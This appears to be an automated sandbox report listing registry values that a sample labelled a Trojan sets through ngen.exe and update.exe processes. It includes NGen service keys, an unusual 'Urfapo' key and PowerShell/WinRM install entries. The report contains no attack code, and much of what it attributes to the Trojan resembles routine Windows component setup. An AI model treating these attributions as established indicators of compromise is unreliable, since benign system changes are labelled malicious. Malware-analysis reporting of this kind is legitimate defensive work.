[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 A4 9C 3E 6D 8F EF 95 1D E9 A2 29 29 14 CD 31"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 36 3F 03 CA D9 49 27 40 EC 1E 2A 3E ED 88 44"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 06 AE E1 A2 9A 6F 17 80 7E CC A6 C6 71 8C 02"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA BF 7F 74 13 7A 0E 30 EE C9 E7 3C 1F 4B 7E 7B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 60 25 1D 59 3F 5B A2 71 C0 34 E4 A8 40 77 57"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 91 A1 4B 8E AF C1 5E F3 AF FA 92 92 7F EC 6A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 00 E6 A9 17 31 9E D1 C0 2B A6 B3 D9 54 7C C9"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 00 5B A4 3B 3B 6C 41 92 DB A0 1E EA 8D 9B 22"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 22 E0 FD 15 DA 56 7A 9F CB 8A 7B 9B F4 FD 91"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 75 E2 45 15 39 DA 4E 54 AA 43 CC 21 47 F4 18"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 03 D2 02 EC DC 5E F3 2A B2 2C BA D5 8E 28 53"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 A1 B5 D3 FB 93 58 64 35 9C 44 41 34 0D 19 41"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 87 E0 CA 67 5F 96 A0 E1 59 68 FE 09 42 DB C7"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE FE FD 38 57 45 58 6C 2F E3 28 00 11 68 56 4A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 57 E3 32 38 3D DB 9A 85 31 57 BA 83 6E 1D 1F"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:648 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C F5 C4 7C 9E A7 9B C2 5B A5 7B 45 F9 0E CC A1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process update.exe:4040 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

